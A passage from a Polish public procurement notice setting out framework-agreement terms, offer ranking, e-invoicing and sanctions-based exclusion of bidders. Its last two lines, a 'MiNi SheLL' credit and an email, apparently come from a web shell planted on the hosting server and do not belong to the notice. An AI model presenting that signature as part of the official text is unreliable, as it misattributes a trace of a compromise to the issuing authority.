Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć oferty częściowe – nie dotyczy.<br/>4)	Powód niedokonania podziału zamówienia na części (jeżeli dotyczy): NIE DOTYCZY<br/><br/>Zamawiający:<br/>5) nie przewiduje wizji lokalnej lub sprawdzenia przez Wykonawców dokumentów niezbędnych do realizacji zamówienia.<br/>6) nie wymaga i nie dopuszcza składania ofert wariantowych,<br/>7) Zamawiający zawrze umowy ramowe z maksymalnie 5 (pięcioma) Wykonawcami ( i z każdym następnym Wykonawcą, który uzyska taką samą liczbę punktów, co ostatni zakwalifikowany Wykonawca), których oferty spełniają wymagania SWZ i ustawy Pzp oraz otrzymają najwyższą liczbę punktów na podstawie kryteriów oceny ofert określonych w SWZ. W przypadku założenia w postępowaniu ofert niepodlegających odrzuceniu przez większą liczbę niż pięciu (5) Wykonawców niepodlegających wykluczeniu, Zamawiający dokona rankingu ofert na podstawie kryteriów oceny ofert i zawrze umowę ramową z pięcioma (5), którzy uzyskali najwyższą liczbę punktów. W przypadku złożenia w postępowaniu ofert niepodlegających odrzuceniu przez pięciu (5) lub mniej niż pięciu (5) Wykonawców niepodlegających wykluczeniu, Zamawiający zawrze umowę ramową ze wszystkimi wykonawcami,<br/>8) nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt. 7 lub 8,<br/>9) nie przewiduje rozliczenia w walutach obcych, <br/>10) nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej,<br/>11) nie przewiduje zwrotu kosztów udziału w postępowaniu, <br/>12) nie wymaga zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy Pzp<br/>13) Zamawiający nie wymaga zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt. 2 ustawy.<br/>14) Zamawiający wyraża zgodę na przesyłanie ustrukturyzowanych faktur elektronicznych za pośrednictwem Platformy Elektronicznego Fakturowania (indywidualny identyfikator o numerze PEPPOL GLN 5907714353659).<br/>15) Zamawiający wykluczy wykonawcę z postępowania, w przypadkach wskazanych w przepisie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2023 r., poz. 129 z późn. zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com